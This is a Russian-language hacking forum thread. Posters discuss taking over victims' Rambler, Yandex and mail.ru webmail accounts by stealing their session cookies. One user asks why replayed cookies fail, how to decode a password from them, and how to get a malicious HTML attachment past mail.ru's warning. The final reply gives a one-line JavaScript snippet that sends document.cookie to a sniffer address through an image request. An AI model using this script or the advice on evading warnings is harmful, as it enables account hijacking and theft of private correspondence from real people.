Проблема такова: Украл куки с рамблеровского ящика жертвы, куки в себе содержат такие параметры rmw=*********** rmclick=*********** begun_uuid=*********** dv=*********** dvr=*********** lvr=*********** ruid=*********** rlogin=*********** rup=*********** Звездочками скрыл данные(не хочю разглашать) Так вот, иду в оперу заменяю куки как положено, нажимаю обновить и ничего не происходит, я остаюся в своем же ящике, посоветуйте что то?! или посоветуйте прогу, которой можно было бы раскодировать пароль из куки!
Раскодировать пароль - никак, правда ходят слухи, что есть умельцы которые извлекают из них МД5 пароля и готовы поделиться способом за $$$, но скорей всего кидалы... По теме - мб он нажал "Выход", либо залогинился с др. браузера после того как ты слизал куки, мб он вообще не ставил галку на "Запомнить меня" Вобщем устарели куки... тяни новые...
Когда я присылаю жертве html файл со скриптом, который крадет куки: если ящик жертвы на 1) rambler, то куки на сниффер приходят, я их заменяю,но не могу зайти в ящик жертвы! 2)yandex, то куки вообще на сниффер не приходят! 3)mail.ru, при получении файла , у жертвы красным написано "Потенциально опасный файл", и как ето предотвратить, уже и ссылку на сниффер кодирывал! Посоветуйте что и как мне лучше делать?!
На рамблере такая штука уже непройдет, непытайся, а насчет @mail.ru и @yandex.ru то там все ок пашет!
HTML: <script>img = new Image(); img.src = "адресс сниффера"+document.cookie;</script> адресс сниффера закодирован ЗЫ: xss бред, лично мое мнение!